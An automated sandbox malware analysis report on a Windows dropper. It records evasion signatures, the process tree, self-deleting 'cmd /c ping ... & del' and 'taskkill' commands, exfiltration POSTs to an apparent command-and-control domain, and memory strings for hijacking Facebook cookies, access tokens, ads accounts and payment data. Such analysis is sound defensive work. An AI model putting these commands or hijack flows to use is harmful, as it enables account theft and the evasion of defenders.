Analysis Report N1yprTBBXs.exe

Overview

General Information

Sample Name: N1yprTBBXs.exe
Analysis ID: 346123
MD5: f7d7c89f3f5cbc925480b46b7b934157
SHA1: 73e389b70cf3d8975ccbaf7d04f4c45cc80be860
SHA256: 2870f899f2e9ec540da321f603cfb1a735dcd06df016718e663dc78fefdf5e0a

Detection

Score: 93
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Hides threads from debuggers
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has a writeable .text section
Registers a new ROOT certificate
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a Chrome extension
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains strange resources
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Startup

  • System is w10x64
  • N1yprTBBXs.exe (PID: 6476 cmdline: 'C:\Users\user\Desktop\N1yprTBBXs.exe' MD5: F7D7C89F3F5CBC925480B46B7B934157)
    • msiexec.exe (PID: 6548 cmdline: msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • 6272167835D47591.exe (PID: 6612 cmdline: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 0011 user01 MD5: F7D7C89F3F5CBC925480B46B7B934157)
      • 1611970727133.exe (PID: 6944 cmdline: 'C:\Users\user\AppData\Roaming\1611970727133.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970727133.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)
      • ThunderFW.exe (PID: 7100 cmdline: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' MD5: F0372FF8A6148498B19E04203DBB9E69)
      • cmd.exe (PID: 6096 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 3656 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
    • 6272167835D47591.exe (PID: 6684 cmdline: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 200 user01 MD5: F7D7C89F3F5CBC925480B46B7B934157)
      • cmd.exe (PID: 7012 cmdline: cmd.exe /c taskkill /f /im chrome.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 7132 cmdline: taskkill /f /im chrome.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • cmd.exe (PID: 7100 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 5112 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
    • cmd.exe (PID: 6716 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\N1yprTBBXs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 6848 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
  • msiexec.exe (PID: 6640 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 0B37D2846804C02059732A6A10D93625 C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.278675442.0000000002730000.00000040.00000001.sdmp | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth | 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000002.00000002.350264468.0000000002880000.00000040.00000001.sdmp | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth | 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000000.00000002.264281682.0000000002750000.00000040.00000001.sdmp | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth | 0x25484:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.N1yprTBBXs.exe.2750000.2.unpack | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth | 0x25484:$x1: cmd /c ping 127.0.0.1 -n
0.2.N1yprTBBXs.exe.2750000.2.raw.unpack | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth | 0x25484:$x1: cmd /c ping 127.0.0.1 -n
2.2.6272167835D47591.exe.10000000.7.unpack | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth | 0x25484:$x1: cmd /c ping 127.0.0.1 -n
2.2.6272167835D47591.exe.2880000.4.unpack | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth | 0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.6272167835D47591.exe.2730000.5.raw.unpack | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth | 0x25484:$x1: cmd /c ping 127.0.0.1 -n

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe, Metadefender: Detection: 18%
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe, ReversingLabs: Detection: 59%
Multi AV Scanner detection for submitted file
Source: N1yprTBBXs.exe, Virustotal: Detection: 38%
Source: N1yprTBBXs.exe, Metadefender: Detection: 18%
Source: N1yprTBBXs.exe, ReversingLabs: Detection: 59%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe, Joe Sandbox ML: detected
Machine Learning detection for sample
Source: N1yprTBBXs.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\N1yprTBBXs.exe, Code function: 0_2_004C24B0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptGetHashParam,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptDestroyHash,0_2_004C24B0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe, Code function: 0_2_00463680 _memset,GetAdaptersInfo,_memset,_sprintf,CryptAcquireContextW,CryptCreateHash,CryptHashData,_memset,CryptGetHashParam,CryptGetHashParam,CryptGetHashParam,_sprintf,CryptDestroyHash,CryptReleaseContext,0_2_00463680
Source: C:\Users\user\Desktop\N1yprTBBXs.exe, Code function: 0_2_00456840 CryptDecodeObject,CryptAcquireContextW,CryptDecodeObject,CryptDecodeObject,CryptDecodeObject,CryptDecodeObject,CryptImportKey,0_2_00456840
Source: C:\Users\user\Desktop\N1yprTBBXs.exe, Code function: 0_2_0045C870 CryptQueryObject,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertCloseStore,0_2_0045C870
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe, Code function: 2_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,2_2_1001F720

Compliance:

Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\N1yprTBBXs.exe, Unpacked PE file: 0.2.N1yprTBBXs.exe.2750000.2.unpack
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe, Unpacked PE file: 2.2.6272167835D47591.exe.2880000.4.unpack
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe, Unpacked PE file: 4.2.6272167835D47591.exe.2730000.5.unpack
Uses 32bit PE files
Source: N1yprTBBXs.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses new MSVCR Dlls
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe, File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: N1yprTBBXs.exe, Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.2.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1611970727133.exe, 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp, 1611970727133.exe.2.dr
Source: Binary string: atl71.pdbT source: atl71.dll.2.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.2.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.2.dr
Source: Binary string: atl71.pdb source: atl71.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.2.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.2.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.2.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.2.dr
Source: Binary string: p:\p\agents\hpam2.eem\recipes\499894881\base\branches\goopy2_release_branch\googleclient\ime\goopy\scons-out\opt\obj\syncer\daemon_unsigned.pdb source: N1yprTBBXs.exe
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp, ThunderFW.exe.2.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.2.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.2.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSI1983.tmp.1.dr
Source: C:\Windows\SysWOW64\msiexec.exe, File opened: z:, x:, v:, t:, r:, p:, n:, l:, j:, h:, f:, b:, y:, w:, u:, s:, q:, o:, m:, k:, i:, g:, e:, c:, a:
Source: C:\Users\user\Desktop\N1yprTBBXs.exe, Code function: 0_2_00410120 _memset,PathCombineW,_memset,FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,FindClose,0_2_00410120
Source: C:\Users\user\Desktop\N1yprTBBXs.exe, Code function: 0_2_00413360 _memset,_memset,PathCombineW,FindFirstFileW,_memset,PathCombineW,DeleteFileW,GetLastError,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,MoveFileExW,0_2_00413360
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe, Code function: 2_2_1001A170 FindFirstFileA,FindClose,2_2_1001A170
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Google\

Networking:

Uses ping.exe to check the status of other devices and networks
Source: unknown, Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: global traffic, HTTP traffic detected: GET /info_old/ddd HTTP/1.1 | Host: 84CFBA021A5A6662.xyz | Accept: */*
Source: global traffic, HTTP traffic detected: POST //fine/send HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 82 | Host: 84cfba021a5a6662.xyz
Source: global traffic, HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xyz
Source: global traffic, HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xyz
Source: global traffic, HTTP traffic detected: POST /info_old/e HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 677 | Host: 84cfba021a5a6662.xyz
Source: global traffic, HTTP traffic detected: POST /info_old/g HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 1393 | Host: 84cfba021a5a6662.xyz
Source: global traffic, HTTP traffic detected: GET /info_old/r HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Host: 84cfba021a5a6662.xyz
Source: global traffic, HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xyz | Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 65 4c 39 39 71 72 45 30 32 4f 31 47 46 52 6a 30 50 36 5f 47 36 63 7e | Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVeL99qrE02O1GFRj0P6_G6c~
Source: global traffic, HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xy | Data Raw: | Data Ascii:
Source: C:\Users\user\Desktop\N1yprTBBXs.exe, Code function: 0_2_00454060 WaitForSingleObject,HttpOpenRequestW,HttpSendRequestW,HttpQueryInfoW,InternetReadFile,_memmove,InternetCloseHandle,InternetCloseHandle,0_2_00454060
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpString found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpString found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 6272167835D47591.exeString found in binary or memory: _time":"13245950599128816","lastpingday":"13245947458518717","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale equals www.youtube.com (Youtube)
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpString found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@&#064;@&#064;https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: */*Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: */*Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpString found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpString found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpString found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 6272167835D47591.exeString found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/adsmanager/manage/ads equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/comet/try/ equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2 equals www.facebook.com (Facebook)
